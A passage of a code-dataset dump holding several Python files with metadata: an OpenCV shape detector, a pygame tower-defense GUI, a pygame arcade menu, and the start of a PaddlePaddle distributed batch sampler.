aspRatio >= .95 and aspRatio <= 1.05:\n shape = \"Square\"\n elif aspRatio >= 1.05 and aspRatio <= 1.3:\n shape = \"Rectangle\"\n elif aspRatio > 1.3:\n shape = \"Diamond\"\n else:\n shape = \"Trapezoid\"\n elif len(approx) == 5:\n shape = \"Pentagon\"\n elif len(approx) == 10:\n shape = \"Star\"\n\n elif len(approx) == 12:\n shape = \"Plus\"\n else:\n #utilize hough circle to identify circles\n shape = \"Circle\"\n return shape\n\n", "repo_name": "UCR-UAS/Payload", "sub_path": "Payload/ADLC/ShapeRecog/shapeDetector.py", "file_name": "shapeDetector.py", "file_ext": "py", "file_size_in_byte": 2039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "cv2.arcLength", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.approxPolyDP", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "27758732667", "text": "import re\nimport pygame_gui as pg_gui\nimport pygame as pg\nimport arch.gui as gui\nimport arch.game_section as gm_sect\nimport arch.model_wrap as mod_wp\nimport game_sections.pause_menu as pause_menu\nimport game_sections.end_game_screen as end_game_screen\n\n\nclass GameScreenGUI(gui.GUI):\n '''\n Class of game screen GUI\n '''\n '''\n Класс ГПИ игрового экрана\n '''\n\n def __init__(self, event_manager, visual_manager, game_section):\n '''\n Init method of the game screen GUI\n :param event_manager: event manager that will manage this\n GUI\n :param visual_manager: visual manager that will manage this\n GUI\n :param game_section: game section that owns this GUI\n '''\n '''\n Метод инициализации ГПИ игрового экрана\n :param event_manager: менеджер событий, управляющий данным\n ГПИ\n :param visual_manager: холст, на котором будет отрисован\n данный ГПИ\n :param game_section: игровая секция, к которой относится\n данный ГПИ\n '''\n\n super().__init__(event_manager, visual_manager, game_section,\n \"./assets/gui/themes/game_screen_theme.json\")\n\n def panel_init(self):\n '''\n Init method of all game screen GUI panels\n '''\n '''\n Метод инициализации всех панелей ГПИ игрового экрана\n '''\n\n shop_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(20, 220, 243, 330),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"shop-pnl\"\n )\n\n time_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(20, 20, 110, 71),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"time-pnl\"\n )\n\n wave_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(150, 20, 110, 71),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"wave-pnl\"\n )\n\n health_pnl = gui.GUI.Panel(\n relative_rect=pg.Rect(20, 120, 243, 71),\n starting_layer_height=1,\n manager=self.ui_manager,\n object_id=\"health-pnl\"\n )\n\n self.panels.update({\"shop-pnl\": shop_pnl})\n self.panels.update({\"time-pnl\": time_pnl})\n self.panels.update({\"wave-pnl\": wave_pnl})\n self.panels.update({\"health-pnl\": health_pnl})\n\n def button_init(self):\n '''\n Init method of all game screen GUI buttons\n '''\n '''\n Метод инициализации всех кнопок ГПИ игрового экрана\n '''\n\n pause_btn = gui.GUI.Button(\n relative_rect=pg.Rect(20, 660, 241, 60),\n text=\"\",\n manager=self.ui_manager,\n tool_tip_text=\"Click to pause\",\n object_id=\"pause-btn\"\n )\n\n shop_container = self.panels[\"shop-pnl\"].get_container()\n\n buy_archer_btn = gui.GUI.Button(\n relative_rect=pg.Rect(9, 50,\n 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Buy Archer tower\",\n object_id=\"buy-ARCHER-btn\"\n )\n\n buy_minigun_btn = gui.GUI.Button(\n relative_rect=pg.Rect(128, 50,\n 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Buy Minigun tower\",\n object_id=\"buy-MINIGUN-btn\"\n )\n\n buy_tank_btn = gui.GUI.Button(\n relative_rect=pg.Rect(9, 190,\n 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Buy Tank tower\",\n object_id=\"buy-TANK-btn\"\n )\n\n sell_btn = gui.GUI.Button(\n relative_rect=pg.Rect(128, 190, 104, 130),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n tool_tip_text=\"Sell tower\",\n object_id=\"sell-btn\"\n )\n\n cancel_btn = gui.GUI.Button(\n relative_rect=pg.Rect(20, 575, 241, 60),\n text=\"\",\n manager=self.ui_manager,\n visible=False,\n tool_tip_text=\"Click to cancel\",\n object_id=\"cancel-btn\"\n )\n\n 
self.buttons.update({\"pause-btn\": pause_btn})\n self.buttons.update({\"buy-archer-btn\": buy_archer_btn})\n self.buttons.update({\"buy-minigun-btn\": buy_minigun_btn})\n self.buttons.update({\"buy-tank-btn\": buy_tank_btn})\n self.buttons.update({\"sell-btn\": sell_btn})\n self.buttons.update({\"cancel-btn\": cancel_btn})\n\n def label_init(self):\n '''\n Init method of all game screen GUI labels (including linked labels)\n '''\n '''\n Метод инициализации все надписей ГПИ игрового экрана\n (в том числе связанных)\n '''\n\n time_container = self.panels[\"time-pnl\"].get_container()\n wave_container = self.panels[\"wave-pnl\"].get_container()\n health_container = self.panels[\"health-pnl\"].get_container()\n shop_container = self.panels[\"shop-pnl\"].get_container()\n\n time_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(10, 40, 90, 25),\n text=\"\",\n manager=self.ui_manager,\n container=time_container,\n object_id=\"time-lbl\"\n )\n\n def decor(func):\n def core():\n time = int(func())\n secs = time % 60\n mins = time // 60\n return f\"{mins:02d}:{secs:02d}\"\n return core\n time_update = decor(self.game_section.get_model_time)\n time_linlbl = gui.GUI.LinkedLabel(time_lbl, time_update)\n\n money_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(127, 18, 110, 25),\n text=\"\",\n manager=self.ui_manager,\n container=shop_container,\n object_id=\"money-lbl\"\n )\n\n def decor(func):\n def core():\n money = func()\n return f\"{money:05d}\"\n return core\n money_update = decor(self.game_section.get_model_money)\n money_linlbl = gui.GUI.LinkedLabel(money_lbl, money_update)\n\n wave_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(10, 40, 90, 25),\n text=\"\",\n manager=self.ui_manager,\n container=wave_container,\n object_id=\"wave-lbl\"\n )\n\n def decor(func):\n def core():\n curr, full = func()\n return f\"{curr}/{full}\"\n return core\n wave_update = decor(self.game_section.get_model_wave)\n wave_linlbl = gui.GUI.LinkedLabel(wave_lbl, wave_update)\n\n health_lbl = gui.GUI.Label(\n relative_rect=pg.Rect(110, 10, 125, 50),\n text=\"\",\n manager=self.ui_manager,\n container=health_container,\n object_id=\"health-lbl\"\n )\n\n def decor(func):\n def core():\n curr, full = func()\n return f\"{curr} / {full}\"\n return core\n health_update = decor(self.game_section.get_model_base_health)\n health_linlbl = gui.GUI.LinkedLabel(health_lbl, health_update)\n\n self.linked_labels.update({\"time-lbl\": time_linlbl})\n self.linked_labels.update({\"money-lbl\": money_linlbl})\n self.linked_labels.update({\"wave-lbl\": wave_linlbl})\n self.linked_labels.update({\"health-lbl\": health_linlbl})\n\n def button_handling(self, event):\n '''\n Method for proccessing of button related events\n :param event: button related pygame event,\n start menu gui should proccess\n '''\n '''\n Метод, обрабатывающий события кнопок\n :param event: pygame event связанный с кнопками,\n которое ГПИ главного меню должен обработать\n '''\n\n if event.user_type == pg_gui.UI_BUTTON_PRESSED:\n if event.ui_object_id == \"pause-btn\":\n self.game_section.unplug()\n pause_menu.PauseMenu(self.game_section.ms_event_manager,\n self.game_section.ms_visual_manager,\n self.game_section)\n\n elif re.search(r\"shop-pnl\\.#panel_container\\..*-btn\",\n event.ui_object_id):\n self.shop_btn_handle(event)\n\n elif event.ui_object_id == \"buy-plc-btn\":\n self.buy_plc_btn_handle(event)\n\n elif event.ui_object_id == \"sell-plc-btn\":\n self.sell_plc_btn_handle(event)\n\n elif event.ui_object_id == \"cancel-btn\":\n self.buttons['buy-archer-btn'].enable()\n 
self.buttons['buy-minigun-btn'].enable()\n self.buttons['buy-tank-btn'].enable()\n self.buttons['sell-btn'].enable()\n self.buttons[\"cancel-btn\"].hide()\n buttons_to_del = []\n for name in self.buttons:\n if (re.search(\"buy-plc-*\", name) is not None\n or re.search(\"sell-plc-*\", name) is not None):\n buttons_to_del.append(name)\n\n for name in buttons_to_del:\n self.remove_element(name)\n\n def shop_btn_handle(self, event):\n if re.search(r\"shop-pnl\\.#panel_container\\.buy-.*-btn\",\n event.ui_object_id):\n\n tower_type = re.search(r\"shop-pnl\\.#panel_container\\.\"\n r\"buy-(.*)-btn\",\n event.ui_object_id).group(1)\n model_wrap = self.game_section.model_wrap\n free_space = model_wrap.get_free_space(tower_type)\n\n if len(free_space) > 0:\n self.buttons['buy-archer-btn'].disable()\n self.buttons['buy-minigun-btn'].disable()\n self.buttons['buy-tank-btn'].disable()\n self.buttons['sell-btn'].disable()\n self.buttons[\"cancel-btn\"].show()\n\n for i in range(len(free_space)):\n button_rect = pg.Rect(0, 0, 70, 70)\n button_rect.center = free_space[i]\n plc_btn = gui.GUI.Button(\n relative_rect=button_rect,\n text=\"\",\n manager=self.ui_manager,\n tool_tip_text=\"Click to confirm\",\n object_id=\"buy-plc-btn\"\n )\n self.buttons.update({f\"buy-plc-{i}\": plc_btn})\n\n elif event.ui_object_id == \"shop-pnl.#panel_container.sell-btn\":\n model_wrap = self.game_section.model_wrap\n occupied_space = model_wrap.get_occupied_space()\n\n if len(occupied_space) > 0:\n self.buttons['buy-archer-btn'].disable()\n self.buttons['buy-minigun-btn'].disable()\n self.buttons['buy-tank-btn'].disable()\n self.buttons['sell-btn'].disable()\n self.buttons[\"cancel-btn\"].show()\n\n for i in range(len(occupied_space)):\n button_rect = pg.Rect(0, 0, 70, 70)\n button_rect.center = occupied_space[i]\n plc_btn = gui.GUI.Button(\n relative_rect=button_rect,\n text=\"\",\n manager=self.ui_manager,\n tool_tip_text=\"Click to confirm\",\n object_id=\"sell-plc-btn\"\n )\n self.buttons.update({f\"sell-plc-{i}\": plc_btn})\n\n def buy_plc_btn_handle(self, event):\n self.buttons['buy-archer-btn'].enable()\n self.buttons['buy-minigun-btn'].enable()\n self.buttons['buy-tank-btn'].enable()\n self.buttons['sell-btn'].enable()\n self.buttons[\"cancel-btn\"].hide()\n\n model_wrap = self.game_section.model_wrap\n tower_type = model_wrap.selected_tower_type\n pos = list(event.ui_element.get_relative_rect().center)\n\n buy_msg = mod_wp.ModelWrap.BUY_TOWER(tower_type, pos,\n address=model_wrap)\n self.event_manager.post(buy_msg)\n\n buttons_to_del = []\n for name in self.buttons:\n if re.search(\"buy-plc-*\", name):\n buttons_to_del.append(name)\n\n for name in buttons_to_del:\n self.remove_element(name)\n\n def sell_plc_btn_handle(self, event):\n self.buttons['buy-archer-btn'].enable()\n self.buttons['buy-minigun-btn'].enable()\n self.buttons['buy-tank-btn'].enable()\n self.buttons['sell-btn'].enable()\n self.buttons[\"cancel-btn\"].hide()\n\n model_wrap = self.game_section.model_wrap\n pos = list(event.ui_element.get_relative_rect().center)\n\n sell_msg = mod_wp.ModelWrap.SELL_TOWER(pos,\n address=model_wrap)\n self.event_manager.post(sell_msg)\n\n buttons_to_del = []\n for name in self.buttons:\n if re.search(\"sell-plc-*\", name):\n buttons_to_del.append(name)\n\n for name in buttons_to_del:\n self.remove_element(name)\n\n\nclass GameScreen(gm_sect.GameSection):\n '''\n Class of the game screen\n '''\n '''\n Класс меню выбора уровня\n '''\n\n def __init__(self, ms_event_manager, ms_visual_manager, lvl_path):\n '''\n Init 
method of the game screen\n :param ms_event_manager: link to the master event manager\n :param ms_visual_manager: link to the master visual manager\n :param lvl_path: path str to the level folder\n '''\n '''\n Метод инициализации игровой экран\n :param ms_event_manager: ссылка на главного обработчика событий\n :param ms_visual_manager: ссылка на главный холст\n :param lvl_path: строка с путем до папки с уровнем\n '''\n\n super().__init__(ms_event_manager, ms_visual_manager, GameScreenGUI)\n self.model_wrap = mod_wp.ModelWrap(self.event_manager, self.canvas,\n self, lvl_path)\n\n def get_model_time(self):\n '''\n Method that wraps the model_wrap.clock.get_time()\n '''\n '''\n Метод обертка для метода model_wrap.clock.get_time()\n '''\n\n return self.model_wrap.clock.get_time()\n\n def get_model_money(self):\n '''\n Method that wraps the model_wrap.get_money()\n '''\n '''\n Метод обертка для метода model_wrap.get_money()\n '''\n\n return self.model_wrap.get_money()\n\n def get_model_wave(self):\n '''\n Method that wraps the model_wrap.get_wave()\n '''\n '''\n Метод обертка для метода model_wrap.get_wave()\n '''\n\n return self.model_wrap.get_wave()\n\n def get_model_base_health(self):\n '''\n Method that wraps the model_wrap.get_base_health()\n '''\n '''\n Метод обертка для метода model_wrap.get_base_health()\n '''\n\n return self.model_wrap.get_base_health()\n\n def end_game(self, win_flag):\n self.unplug()\n end_game_screen.EndGameScreen(self.ms_event_manager,\n self.ms_visual_manager,\n win_flag)\n", "repo_name": "SenpaiKirigaia/AAA-Tower-defense", "sub_path": "game_sections/game_screen.py", "file_name": "game_screen.py", "file_ext": "py", "file_size_in_byte": 18534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "arch.gui.GUI", "line_number": 11, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 11, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 49, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 49, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 49, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 50, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 56, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 56, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 56, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 57, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 63, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 63, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 63, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 64, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Panel", "line_number": 70, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 70, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 70, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 71, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 90, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 90, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 90, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 91, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 100, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 100, "usage_type": 
"attribute"}, {"api_name": "arch.gui", "line_number": 100, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 101, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 110, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 110, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 110, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 111, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 120, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 120, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 120, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 121, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 130, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 130, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 130, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 131, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 139, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 139, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 139, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 140, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Label", "line_number": 169, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 169, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 169, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 170, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 185, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 185, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 185, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Label", "line_number": 187, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 187, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 187, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 188, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 201, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 201, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 201, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Label", "line_number": 203, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 203, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 203, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 204, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 217, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 217, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 217, "usage_type": "name"}, {"api_name": "arch.gui.GUI.Label", "line_number": 219, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 219, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 219, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 220, "usage_type": "call"}, {"api_name": "arch.gui.GUI.LinkedLabel", "line_number": 233, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 233, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 233, "usage_type": "name"}, {"api_name": "pygame_gui.UI_BUTTON_PRESSED", "line_number": 252, "usage_type": "attribute"}, {"api_name": 
"game_sections.pause_menu.PauseMenu", "line_number": 255, "usage_type": "call"}, {"api_name": "game_sections.pause_menu", "line_number": 255, "usage_type": "name"}, {"api_name": "re.search", "line_number": 259, "usage_type": "call"}, {"api_name": "re.search", "line_number": 277, "usage_type": "call"}, {"api_name": "re.search", "line_number": 278, "usage_type": "call"}, {"api_name": "re.search", "line_number": 285, "usage_type": "call"}, {"api_name": "re.search", "line_number": 288, "usage_type": "call"}, {"api_name": "pygame.Rect", "line_number": 302, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 304, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 304, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 304, "usage_type": "name"}, {"api_name": "pygame.Rect", "line_number": 325, "usage_type": "call"}, {"api_name": "arch.gui.GUI.Button", "line_number": 327, "usage_type": "call"}, {"api_name": "arch.gui.GUI", "line_number": 327, "usage_type": "attribute"}, {"api_name": "arch.gui", "line_number": 327, "usage_type": "name"}, {"api_name": "arch.model_wrap.ModelWrap.BUY_TOWER", "line_number": 347, "usage_type": "call"}, {"api_name": "arch.model_wrap.ModelWrap", "line_number": 347, "usage_type": "attribute"}, {"api_name": "arch.model_wrap", "line_number": 347, "usage_type": "name"}, {"api_name": "re.search", "line_number": 353, "usage_type": "call"}, {"api_name": "arch.model_wrap.ModelWrap.SELL_TOWER", "line_number": 369, "usage_type": "call"}, {"api_name": "arch.model_wrap.ModelWrap", "line_number": 369, "usage_type": "attribute"}, {"api_name": "arch.model_wrap", "line_number": 369, "usage_type": "name"}, {"api_name": "re.search", "line_number": 375, "usage_type": "call"}, {"api_name": "arch.game_section.GameSection", "line_number": 382, "usage_type": "attribute"}, {"api_name": "arch.game_section", "line_number": 382, "usage_type": "name"}, {"api_name": "arch.model_wrap.ModelWrap", "line_number": 405, "usage_type": "call"}, {"api_name": "arch.model_wrap", "line_number": 405, "usage_type": "name"}, {"api_name": "game_sections.end_game_screen.EndGameScreen", "line_number": 450, "usage_type": "call"}, {"api_name": "game_sections.end_game_screen", "line_number": 450, "usage_type": "name"}]}
+{"seq_id": "21164173456", "text": "import button\nimport pygame\npygame.init()\n# Load images\ngrass = pygame.image.load(\"graassland.png\")\nicon = pygame.image.load(\"cow.png\")\n# setup display\nWIDTH,HEIGHT= 700,700\n\nWIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\npygame.display.set_caption(\"ARCADE GAMES\")\n\npygame.display.set_icon(icon)\n\n#colors\nCORAL = (255,127,80)\nTOMATO = (255,99,71)\nWHITE = (255,255,255)\n#fonts\nFONTS = pygame.font.SysFont('comicsans',20)\npygame.transform.smoothscale(grass,(WIDTH,HEIGHT))\n# Setup GameLoop\nclock = pygame.time.Clock()\nrun = True\nFPS=60\n#create button object\nmybutton1 = button.Button(grass,(WIDTH/2),((HEIGHT-200)/4),200,40,CORAL,TOMATO,\"CONNECT 4\",WHITE, FONTS)\nmybutton2 = button.Button(grass,(WIDTH/2),((HEIGHT-200)/4*2),200,40,CORAL,TOMATO,\"COWS AND BULLS\",WHITE, FONTS)\nmybutton3 = button.Button(grass,(WIDTH/2),((HEIGHT-200)/4*3),200,40,CORAL,TOMATO,\"HANGMAN\",WHITE, FONTS)\nmybutton4 = button.Button(grass,(WIDTH/2),((HEIGHT-200)),200,40,CORAL,TOMATO,\"FLOOD IT\",WHITE, FONTS)\nwhile run:\n clock.tick(FPS)\n WIN.blit(grass,(0,0))\n x,y = pygame.mouse.get_pos()\n mybutton1.draw(x,y)\n mybutton2.draw(x,y)\n mybutton3.draw(x,y)\n mybutton4.draw(x,y)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n click_x,click_y = pygame.mouse.get_pos()\n \n if mybutton1.action(click_x,click_y):\n import Connect4\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n\n if mybutton2.action(click_x,click_y):\n import COW\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n if mybutton3.action(click_x,click_y):\n from Hangman import hangman\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n if mybutton4.action(click_x,click_y):\n from FloodIT import Flood_It\n WIN=pygame.display.set_mode((WIDTH,HEIGHT),pygame.RESIZABLE)\n pygame.display.set_caption(\"ARCADE GAMES\")\n pygame.display.set_icon(icon)\n pygame.display.update()\n\n\npygame.quit()\n ", "repo_name": "Saksham-13/CowandBull", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2521, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 3, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 5, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 13, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 20, "usage_type": "call"}, 
{"api_name": "pygame.font", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.transform.smoothscale", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 23, "usage_type": "attribute"}, {"api_name": "button.Button", "line_number": 27, "usage_type": "call"}, {"api_name": "button.Button", "line_number": 28, "usage_type": "call"}, {"api_name": "button.Button", "line_number": 29, "usage_type": "call"}, {"api_name": "button.Button", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mouse.get_pos", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 39, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.MOUSEBUTTONDOWN", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.mouse.get_pos", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 48, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 48, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 53, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 58, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 58, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.RESIZABLE", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.display.set_icon", "line_number": 65, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 65, "usage_type": "attribute"}, 
{"api_name": "pygame.display.update", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "39627026158", "text": "import math\nimport numpy as np\nfrom paddle.io import BatchSampler\nfrom .data_utils import ordered_indices, num_tokens_vec_fn, get_batches_indices\n\nclass DistributedDynamicBatchSampler(BatchSampler):\n ''' 支持多卡训练的动态bsz采样器,与fairseq对齐。 10/2\n '''\n def __init__(self,\n dataset,\n mode='train',\n has_target=False,\n max_tokens=4000,\n max_sentences=None,\n bsz_factor=1,\n seed=1,\n num_replicas=None,\n rank=None,\n drop_last=False):\n self.dataset = dataset\n assert mode in ['train', 'dev', 'test']\n self.shuffle = mode == 'train'\n self.src_sizes = np.array([len(data[0])+1 for data in dataset])\n self.tgt_sizes = np.array([len(data[1])+1 for data in dataset]) if mode != 'test' or has_target else None\n # self.num_tokens_fn = lambda idx:self.dataset[idx]+1 # 长度dset,一定要加eos或sos!!\n assert max_tokens is not None or max_sentences is not None, \\\n \"max_tokens and max_sentences should not be null at the same time, please specify one parameter at least\"\n self.max_tokens = max_tokens\n self.max_sentences = max_sentences\n assert isinstance(bsz_factor, int) and bsz_factor > 0, \\\n \"bsz_factor should be a positive integer\"\n self.bsz_factor = bsz_factor\n self.common_seed=seed\n from paddle.fluid.dygraph.parallel import ParallelEnv\n if num_replicas is not None:\n assert isinstance(num_replicas, int) and num_replicas > 0, \\\n \"num_replicas should be a positive integer\"\n self.nranks = num_replicas\n else:\n self.nranks = ParallelEnv().nranks\n\n if rank is not None:\n assert isinstance(rank, int) and rank >= 0, \\\n \"rank should be a non-negative integer\"\n self.local_rank = rank\n else:\n self.local_rank = ParallelEnv().local_rank\n assert isinstance(drop_last, bool), \\\n \"drop_last should be a boolean number\"\n self.drop_last = drop_last # 如果多余了就不变,bool不变,然后删除最后一个;如果没多余\n self.epoch = 1 # we use 1-based indexing for epochs\n\n # get indices and shuffle samples (only calc once)\n indices = ordered_indices(src_sizes=self.src_sizes, tgt_sizes=self.tgt_sizes,\n common_seed=self.common_seed,shuffle=self.shuffle)\n # get batches indices and subsample for 